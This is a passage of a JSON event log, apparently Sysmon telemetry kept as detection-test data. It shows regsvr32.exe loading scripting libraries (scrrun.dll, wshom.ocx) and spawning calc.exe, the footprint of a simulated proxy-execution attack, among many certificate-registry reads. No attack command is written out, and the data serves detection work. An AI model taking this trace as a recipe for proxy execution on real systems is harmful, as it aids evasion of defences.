"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wshom.ocx", - "image_path": "C:\\Windows\\System32\\wshom.ocx", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "\"C:\\Windows\\System32\\calc.exe\" ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "regsvr32.exe", - "parent_process_path": "C:\\Windows\\System32\\regsvr32.exe", - "pid": 4724, - "ppid": 2012, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "subtype": "create", - "timestamp": 131883573241160000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}", - "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", - "registry_value": "418A073AA3BC3475", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "scrrun.dll", - "image_path": "C:\\Windows\\System32\\scrrun.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "MpClient.dll", - "image_path": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpClient.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "process", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "terminate", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 